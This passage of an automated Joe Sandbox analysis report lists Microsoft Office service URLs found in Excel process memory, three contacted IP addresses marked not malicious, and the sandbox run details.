                                  https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                    		high
                                    https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://login.windows.net/common/oauth2/authorizelj:;-EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                      		high
                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                        		high
                                        https://www.odwebp.svc.ms3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                          		high
                                          https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                            		high
                                            https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://graph.windows.net3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                              		high
                                              https://substrate.office.comsEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE:EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                		high
                                                https://login.windows.net/common/oauth2/authorizeNjT;/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech=9EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                      		high
                                                      https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://officesetup.getmicrosoftkey.comQ%g;DEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                        		high
                                                        http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                          		high
                                                          https://api.office.net?JEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://graph.windows.netpEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://substrate.office.comPEXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml)EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                		high
                                                                https://api.diagnostics.office.comomEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                  		high
                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickrz8_:.EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://nexus.officeapEXCEL.EXE, 00000000.00000002.608824531.0000000012F39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513076581.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413539859.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.456932989.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472613834.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471316055.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413742220.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472235778.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.474334086.0000000012F33000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://clients.config.office.net/user/v1.0/ios3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                        		high
                                                                        https://powerlift.acompli.netmEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://login.windows.net/common/oauth2/authorizeXEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://sr.outlook.office.net/ws/speech/recognize/assistant/workAEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://login.windows.net/common/oauth2/authorizeYEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://login.windows.net/common/oauth2/authorizeZEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionslLEXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                  		high
                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                    		high
                                                                                    https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://substrate.office.com/Todo-Internal.ReadWritenEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://login.windows.net/common/oauth2/authorizeQEXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://www.odwebp.svc.msomEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://clients.config.office.net/user/v1.0/android/policies3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                            		high
                                                                                            https://login.windows.net/common/oauth2/authorize-.EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://login.windows.net/common/oauth2/authorizeTEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://login.windows.net/common/oauth2/authorizeUEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://entitlement.diagnostics.office.comEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                    		high
                                                                                                    https://login.windows.net/common/oauth2/authorizeWEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://login.windows.net/common/oauth2/authorizeHEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                          		high
                                                                                                          https://login.windows.net/common/oauth2/authorizeIEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizeJEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeKEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                    		high
                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeEEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeGEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorize8EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile~9EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://login.windows.net/common/oauth2/authorize9EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeU.Q;/EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://login.windows.net/common/oauth2/authorize?-EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeD..;.EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://devnull.onenote.comedEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://graph.windows.net/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://login.windows.net/common/oauth2/authorizentEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                              		high

                                                                                                                                              Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              45.142.211.62
                                                                                                                                              		unknownRussian Federation
                                                                                                                                              		208861RACKTECHRUfalse
                                                                                                                                              158.69.133.78
                                                                                                                                              		unknownCanada
                                                                                                                                              		16276OVHFRfalse
                                                                                                                                              185.82.126.78
                                                                                                                                              		unknownLatvia
                                                                                                                                              		52173MAKONIXLVfalse

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                              Analysis ID:532757
                                                                                                                                              Start date:02.12.2021
                                                                                                                                              Start time:17:28:03
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 7m 28s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:light
